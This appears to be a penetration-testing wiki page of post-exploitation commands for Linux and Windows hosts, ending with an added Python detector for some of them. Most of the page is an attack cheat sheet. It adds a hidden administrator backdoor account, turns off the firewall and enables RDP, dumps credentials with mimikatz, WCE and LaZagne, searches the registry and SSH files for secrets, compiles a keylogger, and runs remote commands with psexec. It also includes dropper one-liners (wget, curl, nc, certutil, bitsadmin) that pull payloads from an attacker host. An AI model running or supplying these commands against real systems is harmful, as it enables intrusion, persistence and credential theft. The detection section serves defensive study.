Intro to Post Exploitation

Penetration Testing Wiki

Linux Post-exploitation

  • Check for incorrect permissions:

Find setuid binaries:

find / -perm -4000 -ls 2> /dev/null

Find world-writable files:

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

Find world-writable directories:

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

Look for interesting files:

find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null

Check sudo:

sudo su
sudo -l

Decrypt PKCS#12 objects:

openssl pkcs12 -info -in $FILE

Show certs in PKCS#7 file:

openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der

Show keystore content:

keytool -list -v -keystore keystore.jks

  • Commands for information gathering:

ps -ef
/sbin/ifconfig -a
route -n
cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu

Find users with shell access:

egrep -e '/bin/(ba)?sh' /etc/passwd

Check bootup services:

ls /etc/rc*

SSH relationships and logins:

cat ~/.ssh/*



Windows Post-exploitation

Check filesystem:

Like “ls -la” in Linux:

dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt

Compute MD5 hash:

Get-FileHash -Algorithm MD5 -Path .\$FILE

Check registry:

reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

Check scheduler:

schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt

Other checks:

Reboot the system (this restarts the host; it is not a read-only check):

wmic os where Primary='TRUE' reboot

List hotfixes:

wmic qfe
notepad myfile.txt:lion.txt
quser > rdp.txt
netstat -an > netstat.txt
netsh firewall show config > firewall.txt
icacls service.exe
type C:\Windows\System32\drivers\etc\hosts

Wmic commands:

wmic service get name,displayname,pathname,startmode > wmic_service.txt
wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
wmic /node:"" product get name,version,vendor
wmic process get Caption,CommandLine
wmic printer list status
wmic cpu get

List SIDs of the system (as admin):

wmic useraccount get name,sid,fullname

Net commands:

net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr

Backdoor account:

net user hax0r hax0r /add
net localgroup administrators hax0r /add
net localgroup "Remote Desktop users" hax0r /add

Check routing/network information:

route print
arp -A
ipconfig /all

Show file attributes / permissions:

cacls cmd.exe
attrib cmd.exe

List services:

sc queryex type=service state=all
net start

Other info:


Idem for Win XP:

  • Firewall

netsh firewall show stat
netsh firewall show config
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall:

netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

  • RDP

Enable RDP and start Terminal Services:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service type=remotedesktop mode=enable
net start termservice
net start "Terminal Services"
svchost.exe -k termsvcs
tasklist /svc /S servername /U username /P password

Change RDP daemon status from Meterpreter (more Meterpreter commands in the Metasploit Meterpreter Cheat Sheet):

msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1

Change RDP port:

HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp Value: PortNumber REG_DWORD=3389

Remote Execution commands:

wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
tasklist.exe /S $IP /U domain\username
tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
taskkill.exe /S $IP /U domain\username /F /FI "norton"
quser /SERVER:$IP

From sysinternals psexec:

psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI exec via PowerShell:

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Universal

msf exploit(windows/local/ps_wmi_exec) >

On the same host but as another user:

runas /user:administrator cmd
runas /noprofile /user:DOMAIN\administrator cmd
runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"

Windows exploit suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported.

python --update
python --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

Manual method

dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
dir %USERPROFILE%\Favorites
type C:\Windows\System32\drivers\etc\hosts


Download LaZagne from

laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox

RATs (Remote Administration Tools)

  • Pupy: open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool, mainly written in Python


Sniffers for Windows

Install Wireshark; its console capture tool dumpcap can also be used:

dumpcap -D
dumpcap -i $IFACE

Keyloggers for Windows

Windows keylogger (no admin rights):

To cross-compile it for Windows:

i686-w64-mingw32-g++ klog_main.cpp -o klog -static

Network sniffers for Linux

tcpdump -X -s 0 -i $INTERFACE

Password dumping


mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv


Dumps hashes (needs SYSTEM privileges)


WCE (Windows Credential Editor)

Dumps clear passwords:

wce -w

Dumps hashes:


Persistent, writes in credentials.txt:

wce -r

Change your credentials in memory:

wce -s


Droppers are programs that allow you to download tools, trojans, etc. to the target machine in order to continue the compromise locally.

Droppers using Linux

wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE $USER@$IP:~

Droppers using Windows


curl -Uri $URL

See also Powercat in the Powershell frameworks section.




Direct Transfer:

bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE

Using a download queue:

bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE


certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe


notepad.exe http://$IP/file.txt
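
A defender-side view of the commands listed on this page, as an added example that is not part of the original wiki: a small Python matcher that flags the account-creation, firewall, RDP and download one-liners above when they show up in process command-line logs (for example Windows Security event 4688 or Sysmon event 1). The rule names, hosts, account names and addresses are constructed for illustration.

```python
import re

# Added example, not from the original page. Rule names are illustrative.
_F = re.IGNORECASE
RULES = {
    "local_account_created": re.compile(
        r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", _F),
    "local_group_addition": re.compile(
        r'\bnet1?(\.exe)?\s+localgroup\s+("[^"]+"|\S+)\s+\S+\s+/add\b', _F),
    "firewall_disabled": re.compile(
        r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b", _F),
    "rdp_enabled_via_registry": re.compile(
        r"\breg(\.exe)?\s+add\s+.*fDenyTSConnections.*\s/d\s+0\b", _F),
    "certutil_download": re.compile(
        r"\bcertutil(\.exe)?\s+.*[-/]urlcache\b.*\bhttps?://", _F),
    "bitsadmin_download": re.compile(
        r"\bbitsadmin(\.exe)?\s+/(transfer|addfile)\b.*\bhttps?://", _F),
}


def detect(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(events):
    """events: iterable of (host, cmdline) pairs. Returns {host: [rule names]}."""
    hits = {}
    for host, cmdline in events:
        for name in detect(cmdline):
            hits.setdefault(host, set()).add(name)
    return {host: sorted(names) for host, names in hits.items()}


# Constructed sample events; hosts, accounts and addresses are made up.
SAMPLE_EVENTS = [
    ("WS01", r"net user svc_tmp Example123 /add"),
    ("WS01", r"net localgroup administrators svc_tmp /add"),
    ("WS01", r"net user %username%"),                      # benign lookup
    ("SRV02", r"netsh advfirewall set allprofiles state off"),
    ("SRV02", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
              r" /v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    ("SRV02", r'certutil.exe -urlcache -split -f "https://192.0.2.10/f.bin" f.bin'),
    ("WS03", r"certutil -hashfile f.bin SHA256"),          # benign hashing
    ("WS03", r"bitsadmin /transfer job1 /download http://192.0.2.10/f c:\f"),
]

if __name__ == "__main__":
    for host, names in sorted(scan(SAMPLE_EVENTS).items()):
        print(host, names)
```

Grouping hits per host makes combinations stand out: account creation followed by a group addition, or a firewall change next to an RDP registry write, is a stronger signal than any single match.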

Living Off the Land (LOLbins) for Windows



hh.exe C:\windows\system32\calc.exe

C# compiler built-in command:


Droppers Using known protocols



python -m SimpleHTTPServer
python -m SimpleHTTPServer 80


python3 -m http.server 8080


php -S localhost:8000


ruby -run -e httpd . -p 8000


pip install pyftpdlib
python -m pyftpdlib


impacket-smbserver PAYLOADS /root/payload

As part of post-exploitation we can also perform data exfiltration.